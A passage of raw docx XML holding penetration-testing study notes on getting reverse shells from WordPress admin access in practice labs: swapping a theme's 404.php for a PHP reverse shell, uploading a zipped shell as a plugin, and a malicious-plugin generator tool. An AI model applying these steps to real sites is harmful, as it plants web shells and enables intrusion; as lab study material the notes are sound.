        <w:t xml:space="preserve">Another box that requires a reverse shell from admin account of WordPress is </w:t>
      </w:r>
      <w:hyperlink r:id="rId973">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7ud4l95m81pg" w:id="399"/>
      <w:bookmarkEnd w:id="399"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Theme Editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I don't know if </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Privileges </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are necessary, but in the Shenzi PG Practice, we did have them</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId974">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(a windows machine), they recommended that we use the 404.php page instead of something like header.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Theme Editor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1663756" cy="3010607"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId975"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1663756" cy="3010607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to 404.template and delete everything and replace it with a PHP reverse shell and then update page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># You can see the sytax here if you have ever Bruteforced a WordPress site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Knowing this structure is worthwhile. It will come up again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># http://$IP/WP-Root-Install/themes/theme-year-name/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1089"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/shenzi/themes/twentytwenty/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specific one used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId976">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shenzi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice writeup, they used footer.php instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId977">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writeup, they edited the Plugin instead</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D54">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yaaql5aykln6" w:id="400"/>
      <w:bookmarkEnd w:id="400"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Add new" button for plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also done in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for 172.16.xxx.7. I didn't do it myself, but someone else did. They edited the MySQL database to set new password for Admin, and then after logging in, they added malicious plugin to get a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To upload the malicious plug-in, instead of creating a zip folder with a reverse shell manually, they used this tool that is specifically for creating malicious wordpress plugins. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId978">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/wetw0rk/malicious-wordpress-plugin/tree/master?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, this does use a meterpeter shell, which has limited usage in OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wordpwn.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D5F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:hyperlink r:id="rId979">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, in the Plugins section, you might see an "Add new" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="242" name="image238.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image238.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98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2D62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on the "Upload Plugins" button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="226" name="image262.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image262.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98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2D64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, you can try uploading a regular reverse shell (not zipped) and see if it accepts it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it expects a zipped file, we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip -r php-reverse-shell.php.zip php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then upload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php-reverse-shell.php.zip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and hope it unzips the file by itself</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
